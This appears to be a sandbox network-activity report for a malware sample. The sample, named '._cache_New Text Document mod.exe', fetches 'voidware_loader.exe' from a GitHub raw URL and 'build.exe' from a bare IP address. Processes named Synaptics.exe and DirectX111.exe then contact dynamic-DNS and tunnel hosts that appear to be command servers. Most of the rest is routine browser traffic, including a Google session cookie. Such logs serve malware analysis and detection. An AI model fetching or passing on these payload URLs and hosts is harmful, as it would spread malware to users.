https://raw.githubusercontent.com/dzonicar12332/voidddwareee/refs/heads/main/voidware_loader.exe

._cache_New Text Document mod.exe

Remote address:

185.199.111.133:443

Request

GET /dzonicar12332/voidddwareee/refs/heads/main/voidware_loader.exe HTTP/1.1
Host: raw.githubusercontent.com
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Connection: keep-alive
Content-Length: 3266048
Cache-Control: max-age=300
Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
Content-Type: application/octet-stream
ETag: "ad8b7a9e32c02ae5188fe15816b0d4e772a8287fa72a73f681ddd7f08d1324ae"
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
X-Frame-Options: deny
X-XSS-Protection: 1; mode=block
X-GitHub-Request-Id: 4E5A:1F1AED:5CAAEA:7C161F:67854ED7
Accept-Ranges: bytes
Date: Mon, 13 Jan 2025 17:40:21 GMT
Via: 1.1 varnish
X-Served-By: cache-lcy-eglc8600029-LCY
X-Cache: HIT
X-Cache-Hits: 0
X-Timer: S1736790022.639249,VS0,VE221
Vary: Authorization,Accept-Encoding,Origin
Access-Control-Allow-Origin: *
Cross-Origin-Resource-Policy: cross-origin
X-Fastly-Request-ID: abcd62fac329933bdaff86a70dcf8e9e451f6a74
Expires: Mon, 13 Jan 2025 17:45:21 GMT
Source-Age: 0
DNS

49.194.101.151.in-addr.arpa

Dnscache

Remote address:

8.8.8.8:53

Request

49.194.101.151.in-addr.arpa

IN PTR

Response
DNS

133.111.199.185.in-addr.arpa

Dnscache

Remote address:

8.8.8.8:53

Request

133.111.199.185.in-addr.arpa

IN PTR

Response

133.111.199.185.in-addr.arpa

IN PTR

cdn-185-199-111-133githubcom
GET

http://195.177.92.88/build.exe

._cache_New Text Document mod.exe

Remote address:

195.177.92.88:80

Request

GET /build.exe HTTP/1.1
Host: 195.177.92.88
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Content-Type: application/octet-stream
Last-Modified: Mon, 13 Jan 2025 03:26:17 GMT
Accept-Ranges: bytes
ETag: "a0ea9e86a65db1:0"
Server: Microsoft-IIS/10.0
Date: Mon, 13 Jan 2025 17:40:23 GMT
Content-Length: 307712
DNS

88.92.177.195.in-addr.arpa

Dnscache

Remote address:

8.8.8.8:53

Request

88.92.177.195.in-addr.arpa

IN PTR

Response
DNS

www.google.com

firefox.exe

Remote address:

8.8.8.8:53

Request

www.google.com

IN A

Response

www.google.com

IN A

142.250.187.196
GET

https://www.google.com/async/ddljson?async=ntp:2

chrome.exe

Remote address:

142.250.187.196:443

Request

GET /async/ddljson?async=ntp:2 HTTP/2.0
host: www.google.com
sec-fetch-site: none
sec-fetch-mode: no-cors
sec-fetch-dest: empty
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
accept-encoding: gzip, deflate, br, zstd
accept-language: en-US,en;q=0.9
GET

https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0

chrome.exe

Remote address:

142.250.187.196:443

Request

GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/2.0
host: www.google.com
x-client-data: COHsygE=
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: empty
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
accept-encoding: gzip, deflate, br, zstd
accept-language: en-US,en;q=0.9
GET

https://www.google.com/async/newtab_promos

chrome.exe

Remote address:

142.250.187.196:443

Request

GET /async/newtab_promos HTTP/2.0
host: www.google.com
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: empty
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
accept-encoding: gzip, deflate, br, zstd
accept-language: en-US,en;q=0.9
GET

https://www.google.com/sorry/index?continue=https://www.google.com/async/ddljson%3Fasync%3Dntp:2&q=EgS117BTGIiglbwGIjAQB2eKWFd5_IVTzdT51-2s3mtsuuo9IsGeDAw2jPLRRmY-98jxmcPdEtfbziqroG8yAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM

chrome.exe

Remote address:

142.250.187.196:443

Request

GET /sorry/index?continue=https://www.google.com/async/ddljson%3Fasync%3Dntp:2&q=EgS117BTGIiglbwGIjAQB2eKWFd5_IVTzdT51-2s3mtsuuo9IsGeDAw2jPLRRmY-98jxmcPdEtfbziqroG8yAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/2.0
host: www.google.com
sec-fetch-site: none
sec-fetch-mode: no-cors
sec-fetch-dest: empty
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
accept-encoding: gzip, deflate, br, zstd
accept-language: en-US,en;q=0.9
GET

https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_promos&q=EgS117BTGIiglbwGIjBHFCkmmbGmG5r6_bp4TgxWFXoyYLbN0f2U9jjOw6P-5HWIETcCYL4nc1KdgmN2fXwyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM

chrome.exe

Remote address:

142.250.187.196:443

Request

GET /sorry/index?continue=https://www.google.com/async/newtab_promos&q=EgS117BTGIiglbwGIjBHFCkmmbGmG5r6_bp4TgxWFXoyYLbN0f2U9jjOw6P-5HWIETcCYL4nc1KdgmN2fXwyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/2.0
host: www.google.com
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: empty
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
accept-encoding: gzip, deflate, br, zstd
accept-language: en-US,en;q=0.9
DNS

74.204.58.216.in-addr.arpa

Dnscache

Remote address:

8.8.8.8:53

Request

74.204.58.216.in-addr.arpa

IN PTR

Response

74.204.58.216.in-addr.arpa

IN PTR

lhr25s13-in-f101e100net

74.204.58.216.in-addr.arpa

IN PTR

lhr25s13-in-f74�H

74.204.58.216.in-addr.arpa

IN PTR

lhr48s49-in-f10�H
DNS

3.178.250.142.in-addr.arpa

Dnscache

Remote address:

8.8.8.8:53

Request

3.178.250.142.in-addr.arpa

IN PTR

Response

3.178.250.142.in-addr.arpa

IN PTR

lhr48s27-in-f31e100net
DNS

196.187.250.142.in-addr.arpa

Dnscache

Remote address:

8.8.8.8:53

Request

196.187.250.142.in-addr.arpa

IN PTR

Response

196.187.250.142.in-addr.arpa

IN PTR

lhr25s33-in-f41e100net
DNS

clients2.google.com

chrome.exe

Remote address:

8.8.8.8:53

Request

clients2.google.com

IN A

Response

clients2.google.com

IN CNAME

clients.l.google.com

clients.l.google.com

IN A

142.250.187.238
DNS

xred.mooo.com

Synaptics.exe

Remote address:

8.8.8.8:53

Request

xred.mooo.com

IN A

Response
DNS

freedns.afraid.org

Synaptics.exe

Remote address:

8.8.8.8:53

Request

freedns.afraid.org

IN A

Response

freedns.afraid.org

IN A

69.42.215.252
DNS

other-little.gl.at.ply.gg

DirectX111.exe

Remote address:

8.8.8.8:53

Request

other-little.gl.at.ply.gg

IN A

Response

other-little.gl.at.ply.gg

IN A

147.185.221.25
GET

http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978

Synaptics.exe

Remote address:

69.42.215.252:80

Request

GET /api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978 HTTP/1.1
User-Agent: MyApp
Host: freedns.afraid.org
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx
Date: Mon, 13 Jan 2025 17:40:28 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Cache: MISS
DNS

238.187.250.142.in-addr.arpa

Dnscache

Remote address:

8.8.8.8:53

Request

238.187.250.142.in-addr.arpa

IN PTR

Response

238.187.250.142.in-addr.arpa

IN PTR

lhr25s34-in-f141e100net
DNS

252.215.42.69.in-addr.arpa

Dnscache

Remote address:

8.8.8.8:53

Request

252.215.42.69.in-addr.arpa

IN PTR

Response
DNS

252.215.42.69.in-addr.arpa

Dnscache

Remote address:

8.8.8.8:53

Request

252.215.42.69.in-addr.arpa

IN PTR

Response
DNS

16.173.189.20.in-addr.arpa

Dnscache

Remote address:

8.8.8.8:53

Request

16.173.189.20.in-addr.arpa

IN PTR

Response
DNS

drive.google.com

firefox.exe

Remote address:

8.8.8.8:53

Request

drive.google.com

IN A

Response

drive.google.com

IN A

172.217.169.78
GET

https://drive.google.com/

chrome.exe

Remote address:

172.217.169.78:443

Request

GET / HTTP/2.0
host: drive.google.com
sec-ch-ua: "Google Chrome";v="123", "Not:A-Brand";v="8", "Chromium";v="123"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
upgrade-insecure-requests: 1
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
sec-ch-ua-arch: "x86"
sec-ch-ua-platform-version: "10.0.0"
sec-ch-ua-model: ""
sec-ch-ua-bitness: "64"
sec-ch-ua-wow64: ?0
sec-ch-ua-full-version-list: "Google Chrome";v="123.0.6312.123", "Not:A-Brand";v="8.0.0.0", "Chromium";v="123.0.6312.123"
x-client-data: COHsygE=
sec-fetch-site: none
sec-fetch-mode: navigate
sec-fetch-user: ?1
sec-fetch-dest: document
accept-encoding: gzip, deflate, br, zstd
accept-language: en-US,en;q=0.9
DNS

accounts.google.com

firefox.exe

Remote address:

8.8.8.8:53

Request

accounts.google.com

IN A

Response

accounts.google.com

IN A

142.251.173.84
DNS

workspace.google.com

firefox.exe

Remote address:

8.8.8.8:53

Request

workspace.google.com

IN A

Response

workspace.google.com

IN A

142.250.200.46
GET

https://workspace.google.com/intl/en-US/products/drive/

chrome.exe

Remote address:

142.250.200.46:443

Request

GET /intl/en-US/products/drive/ HTTP/2.0
host: workspace.google.com
upgrade-insecure-requests: 1
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
sec-ch-ua: "Google Chrome";v="123", "Not:A-Brand";v="8", "Chromium";v="123"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
sec-ch-ua-arch: "x86"
sec-ch-ua-platform-version: "10.0.0"
sec-ch-ua-model: ""
sec-ch-ua-bitness: "64"
sec-ch-ua-wow64: ?0
sec-ch-ua-full-version-list: "Google Chrome";v="123.0.6312.123", "Not:A-Brand";v="8.0.0.0", "Chromium";v="123.0.6312.123"
x-client-data: COHsygE=
sec-fetch-site: none
sec-fetch-mode: navigate
sec-fetch-user: ?1
sec-fetch-dest: document
accept-encoding: gzip, deflate, br, zstd
accept-language: en-US,en;q=0.9
cookie: NID=520=OcrC5bVu06zqWb-j3yVUiVcwVEbBDc0XZSAv4-9q3iGz-b3wMafMA7y5KojWAfblQZRN0uRf6A6sX64I3JXvtNBWPTi86oXuwyYlKfhz8APVjV42Rd_tOVCQLb0V2z5vxoUHLq2-a3cfoX_7FNQpedxLVkL7j7AMOCiFImW8WcTWDx_n2z10SkDwNA
GET

https://workspace.google.com/assets/426a67ed.css

chrome.exe

Remote address:

142.250.200.46:443

Request

GET /assets/426a67ed.css HTTP/2.0
host: workspace.google.com
sec-ch-ua: "Google Chrome";v="123", "Not:A-Brand";v="8", "Chromium";v="123"
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
sec-ch-ua-platform: "Windows"
accept: text/css,*/*;q=0.1
x-client-data: COHsygE=
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: style
referer: https://workspace.google.com/intl/en-US/products/drive/
accept-encoding: gzip, deflate, br, zstd
accept-language: en-US,en;q=0.9
cookie: NID=520=OcrC5bVu06zqWb-j3yVUiVcwVEbBDc0XZSAv4-9q3iGz-b3wMafMA7y5KojWAfblQZRN0uRf6A6sX64I3JXvtNBWPTi86oXuwyYlKfhz8APVjV42Rd_tOVCQLb0V2z5vxoUHLq2-a3cfoX_7FNQpedxLVkL7j7AMOCiFImW8WcTWDx_n2z10SkDwNA
GET

https://workspace.google.com/assets/2bbaf8c6.css

chrome.exe

Remote address:

142.250.200.46:443

Request

GET /assets/2bbaf8c6.css HTTP/2.0
host: workspace.google.com
sec-ch-ua: "Google Chrome";v="123", "Not:A-Brand";v="8", "Chromium";v="123"
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
sec-ch-ua-platform: "Windows"
accept: text/css,*/*;q=0.1
x-client-data: COHsygE=
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: style
referer: https://workspace.google.com/intl/en-US/products/drive/
accept-encoding: gzip, deflate, br, zstd
accept-language: en-US,en;q=0.9
cookie: NID=520=OcrC5bVu06zqWb-j3yVUiVcwVEbBDc0XZSAv4-9q3iGz-b3wMafMA7y5KojWAfblQZRN0uRf6A6sX64I3JXvtNBWPTi86oXuwyYlKfhz8APVjV42Rd_tOVCQLb0V2z5vxoUHLq2-a3cfoX_7FNQpedxLVkL7j7AMOCiFImW8WcTWDx_n2z10SkDwNA
GET

https://workspace.google.com/assets/426a67ed2.css

chrome.exe

Remote address:

142.250.200.46:443

Request

GET /assets/426a67ed2.css HTTP/2.0
host: workspace.google.com
sec-ch-ua: "Google Chrome";v="123", "Not:A-Brand";v="8", "Chromium";v="123"
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
sec-ch-ua-platform: "Windows"
accept: text/css,*/*;q=0.1
x-client-data: COHsygE=
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: style
referer: https://workspace.google.com/intl/en-US/products/drive/
accept-encoding: gzip, deflate, br, zstd
accept-language: en-US,en;q=0.9
cookie: NID=520=OcrC5bVu06zqWb-j3yVUiVcwVEbBDc0XZSAv4-9q3iGz-b3wMafMA7y5KojWAfblQZRN0uRf6A6sX64I3JXvtNBWPTi86oXuwyYlKfhz8APVjV42Rd_tOVCQLb0V2z5vxoUHLq2-a3cfoX_7FNQpedxLVkL7j7AMOCiFImW8WcTWDx_n2z10SkDwNA
GET

https://workspace.google.com/assets/f261be23.css

chrome.exe

Remote address:

142.250.200.46:443

Request

GET /assets/f261be23.css HTTP/2.0
host: workspace.google.com
sec-ch-ua: "Google Chrome";v="123", "Not:A-Brand";v="8", "Chromium";v="123"
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
sec-ch-ua-platform: "Windows"
accept: text/css,*/*;q=0.1
x-client-data: COHsygE=
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: style
referer: https://workspace.google.com/intl/en-US/products/drive/
accept-encoding: gzip, deflate, br, zstd
accept-language: en-US,en;q=0.9
cookie: NID=520=OcrC5bVu06zqWb-j3yVUiVcwVEbBDc0XZSAv4-9q3iGz-b3wMafMA7y5KojWAfblQZRN0uRf6A6sX64I3JXvtNBWPTi86oXuwyYlKfhz8APVjV42Rd_tOVCQLb0V2z5vxoUHLq2-a3cfoX_7FNQpedxLVkL7j7AMOCiFImW8WcTWDx_n2z10SkDwNA
GET

https://workspace.google.com/assets/0d962dee.css

chrome.exe

Remote address:

142.250.200.46:443

Request

GET /assets/0d962dee.css HTTP/2.0
host: workspace.google.com
sec-ch-ua: "Google Chrome";v="123", "Not:A-Brand";v="8", "Chromium";v="123"
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
sec-ch-ua-platform: "Windows"
accept: text/css,*/*;q=0.1
x-client-data: COHsygE=
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: style
referer: https://workspace.google.com/intl/en-US/products/drive/
accept-encoding: gzip, deflate, br, zstd
accept-language: en-US,en;q=0.9
cookie: NID=520=OcrC5bVu06zqWb-j3yVUiVcwVEbBDc0XZSAv4-9q3iGz-b3wMafMA7y5KojWAfblQZRN0uRf6A6sX64I3JXvtNBWPTi86oXuwyYlKfhz8APVjV42Rd_tOVCQLb0V2z5vxoUHLq2-a3cfoX_7FNQpedxLVkL7j7AMOCiFImW8WcTWDx_n2z10SkDwNA
GET

https://workspace.google.com/assets/f1b5e532.min.js

chrome.exe

Remote address:

142.250.200.46:443

Request

GET /assets/f1b5e532.min.js HTTP/2.0
host: workspace.google.com
sec-ch-ua: "Google Chrome";v="123", "Not:A-Brand";v="8", "Chromium";v="123"
origin: https://workspace.google.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
sec-ch-ua-platform: "Windows"
accept: */*
x-client-data: COHsygE=
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://workspace.google.com/intl/en-US/products/drive/
accept-encoding: gzip, deflate, br, zstd
accept-language: en-US,en;q=0.9
cookie: NID=520=OcrC5bVu06zqWb-j3yVUiVcwVEbBDc0XZSAv4-9q3iGz-b3wMafMA7y5KojWAfblQZRN0uRf6A6sX64I3JXvtNBWPTi86oXuwyYlKfhz8APVjV42Rd_tOVCQLb0V2z5vxoUHLq2-a3cfoX_7FNQpedxLVkL7j7AMOCiFImW8WcTWDx_n2z10SkDwNA
GET

https://workspace.google.com/assets/80078c6d.min.js

chrome.exe

Remote address:

142.250.200.46:443

Request

GET /assets/80078c6d.min.js HTTP/2.0
host: workspace.google.com
sec-ch-ua: "Google Chrome";v="123", "Not:A-Brand";v="8", "Chromium";v="123"
origin: https://workspace.google.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
sec-ch-ua-platform: "Windows"
accept: */*
x-client-data: COHsygE=
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://workspace.google.com/intl/en-US/products/drive/
accept-encoding: gzip, deflate, br, zstd
accept-language: en-US,en;q=0.9
cookie: NID=520=OcrC5bVu06zqWb-j3yVUiVcwVEbBDc0XZSAv4-9q3iGz-b3wMafMA7y5KojWAfblQZRN0uRf6A6sX64I3JXvtNBWPTi86oXuwyYlKfhz8APVjV42Rd_tOVCQLb0V2z5vxoUHLq2-a3cfoX_7FNQpedxLVkL7j7AMOCiFImW8WcTWDx_n2z10SkDwNA
GET

https://workspace.google.com/assets/a9e19642.min.js

chrome.exe

Remote address:

142.250.200.46:443

Request

GET /assets/a9e19642.min.js HTTP/2.0
host: workspace.google.com
sec-ch-ua: "Google Chrome";v="123", "Not:A-Brand";v="8", "Chromium";v="123"
origin: https://workspace.google.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
sec-ch-ua-platform: "Windows"
accept: */*
x-client-data: COHsygE=
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://workspace.google.com/intl/en-US/products/drive/
accept-encoding: gzip, deflate, br, zstd
accept-language: en-US,en;q=0.9
cookie: NID=520=OcrC5bVu06zqWb-j3yVUiVcwVEbBDc0XZSAv4-9q3iGz-b3wMafMA7y5KojWAfblQZRN0uRf6A6sX64I3JXvtNBWPTi86oXuwyYlKfhz8APVjV42Rd_tOVCQLb0V2z5vxoUHLq2-a3cfoX_7FNQpedxLVkL7j7AMOCiFImW8WcTWDx_n2z10SkDwNA
GET

https://workspace.google.com/assets/c64600aa.min.js

chrome.exe

Remote address:

142.250.200.46:443

Request

GET /assets/c64600aa.min.js HTTP/2.0
host: workspace.google.com
sec-ch-ua: "Google Chrome";v="123", "Not:A-Brand";v="8", "Chromium";v="123"
origin: https://workspace.google.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
sec-ch-ua-platform: "Windows"
accept: */*
x-client-data: COHsygE=
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://workspace.google.com/intl/en-US/products/drive/
accept-encoding: gzip, deflate, br, zstd
accept-language: en-US,en;q=0.9
cookie: NID=520=OcrC5bVu06zqWb-j3yVUiVcwVEbBDc0XZSAv4-9q3iGz-b3wMafMA7y5KojWAfblQZRN0uRf6A6sX64I3JXvtNBWPTi86oXuwyYlKfhz8APVjV42Rd_tOVCQLb0V2z5vxoUHLq2-a3cfoX_7FNQpedxLVkL7j7AMOCiFImW8WcTWDx_n2z10SkDwNA
GET

https://workspace.google.com/assets/cd9c842e.min.js

chrome.exe

Remote address:

142.250.200.46:443

Request

GET /assets/cd9c842e.min.js HTTP/2.0
host: workspace.google.com
sec-ch-ua: "Google Chrome";v="123", "Not:A-Brand";v="8", "Chromium";v="123"
origin: https://workspace.google.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
sec-ch-ua-platform: "Windows"
accept: */*
x-client-data: COHsygE=
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://workspace.google.com/intl/en-US/products/drive/
accept-encoding: gzip, deflate, br, zstd
accept-language: en-US,en;q=0.9
cookie: NID=520=OcrC5bVu06zqWb-j3yVUiVcwVEbBDc0XZSAv4-9q3iGz-b3wMafMA7y5KojWAfblQZRN0uRf6A6sX64I3JXvtNBWPTi86oXuwyYlKfhz8APVjV42Rd_tOVCQLb0V2z5vxoUHLq2-a3cfoX_7FNQpedxLVkL7j7AMOCiFImW8WcTWDx_n2z10SkDwNA
GET

https://workspace.google.com/assets/00adf923.min.js

chrome.exe

Remote address:

142.250.200.46:443

Request

GET /assets/00adf923.min.js HTTP/2.0
host: workspace.google.com
sec-ch-ua: "Google Chrome";v="123", "Not:A-Brand";v="8", "Chromium";v="123"
origin: https://workspace.google.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
sec-ch-ua-platform: "Windows"
accept: */*
x-client-data: COHsygE=
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://workspace.google.com/intl/en-US/products/drive/
accept-encoding: gzip, deflate, br, zstd
accept-language: en-US,en;q=0.9
cookie: NID=520=OcrC5bVu06zqWb-j3yVUiVcwVEbBDc0XZSAv4-9q3iGz-b3wMafMA7y5KojWAfblQZRN0uRf6A6sX64I3JXvtNBWPTi86oXuwyYlKfhz8APVjV42Rd_tOVCQLb0V2z5vxoUHLq2-a3cfoX_7FNQpedxLVkL7j7AMOCiFImW8WcTWDx_n2z10SkDwNA
GET

https://workspace.google.com/assets/5e53e9e0.min.js

chrome.exe

Remote address:

142.250.200.46:443

Request

GET /assets/5e53e9e0.min.js HTTP/2.0
host: workspace.google.com
sec-ch-ua: "Google Chrome";v="123", "Not:A-Brand";v="8", "Chromium";v="123"
origin: https://workspace.google.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
sec-ch-ua-platform: "Windows"
accept: */*
x-client-data: COHsygE=
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://workspace.google.com/intl/en-US/products/drive/
accept-encoding: gzip, deflate, br, zstd
accept-language: en-US,en;q=0.9
cookie: NID=520=OcrC5bVu06zqWb-j3yVUiVcwVEbBDc0XZSAv4-9q3iGz-b3wMafMA7y5KojWAfblQZRN0uRf6A6sX64I3JXvtNBWPTi86oXuwyYlKfhz8APVjV42Rd_tOVCQLb0V2z5vxoUHLq2-a3cfoX_7FNQpedxLVkL7j7AMOCiFImW8WcTWDx_n2z10SkDwNA
GET

https://workspace.google.com/assets/7a4d51ed.min.js

chrome.exe

Remote address:

142.250.200.46:443

Request

GET /assets/7a4d51ed.min.js HTTP/2.0
host: workspace.google.com
sec-ch-ua: "Google Chrome";v="123", "Not:A-Brand";v="8", "Chromium";v="123"
origin: https://workspace.google.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
sec-ch-ua-platform: "Windows"
accept: */*
x-client-data: COHsygE=
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://workspace.google.com/intl/en-US/products/drive/
accept-encoding: gzip, deflate, br, zstd
accept-language: en-US,en;q=0.9
cookie: NID=520=OcrC5bVu06zqWb-j3yVUiVcwVEbBDc0XZSAv4-9q3iGz-b3wMafMA7y5KojWAfblQZRN0uRf6A6sX64I3JXvtNBWPTi86oXuwyYlKfhz8APVjV42Rd_tOVCQLb0V2z5vxoUHLq2-a3cfoX_7FNQpedxLVkL7j7AMOCiFImW8WcTWDx_n2z10SkDwNA
GET

https://workspace.google.com/assets/197ab810.min.js

chrome.exe

Remote address:

142.250.200.46:443

Request

GET /assets/197ab810.min.js HTTP/2.0
host: workspace.google.com
sec-ch-ua: "Google Chrome";v="123", "Not:A-Brand";v="8", "Chromium";v="123"
origin: https://workspace.google.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
sec-ch-ua-platform: "Windows"
accept: */*
x-client-data: COHsygE=
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://workspace.google.com/intl/en-US/products/drive/
accept-encoding: gzip, deflate, br, zstd
accept-language: en-US,en;q=0.9
cookie: NID=520=OcrC5bVu06zqWb-j3yVUiVcwVEbBDc0XZSAv4-9q3iGz-b3wMafMA7y5KojWAfblQZRN0uRf6A6sX64I3JXvtNBWPTi86oXuwyYlKfhz8APVjV42Rd_tOVCQLb0V2z5vxoUHLq2-a3cfoX_7FNQpedxLVkL7j7AMOCiFImW8WcTWDx_n2z10SkDwNA
GET

https://workspace.google.com/assets/687e7157.min.js

chrome.exe

Remote address:

142.250.200.46:443

Request

GET /assets/687e7157.min.js HTTP/2.0
host: workspace.google.com
sec-ch-ua: "Google Chrome";v="123", "Not:A-Brand";v="8", "Chromium";v="123"
origin: https://workspace.google.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
sec-ch-ua-platform: "Windows"
accept: */*
x-client-data: COHsygE=
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://workspace.google.com/intl/en-US/products/drive/
accept-encoding: gzip, deflate, br, zstd
accept-language: en-US,en;q=0.9
cookie: NID=520=OcrC5bVu06zqWb-j3yVUiVcwVEbBDc0XZSAv4-9q3iGz-b3wMafMA7y5KojWAfblQZRN0uRf6A6sX64I3JXvtNBWPTi86oXuwyYlKfhz8APVjV42Rd_tOVCQLb0V2z5vxoUHLq2-a3cfoX_7FNQpedxLVkL7j7AMOCiFImW8WcTWDx_n2z10SkDwNA
GET

https://workspace.google.com/assets/1c6fe6ad.min.js

chrome.exe

Remote address:

142.250.200.46:443

Request

GET /assets/1c6fe6ad.min.js HTTP/2.0
host: workspace.google.com
sec-ch-ua: "Google Chrome";v="123", "Not:A-Brand";v="8", "Chromium";v="123"
origin: https://workspace.google.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
sec-ch-ua-platform: "Windows"
accept: */*
x-client-data: COHsygE=
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://workspace.google.com/intl/en-US/products/drive/
accept-encoding: gzip, deflate, br, zstd
accept-language: en-US,en;q=0.9
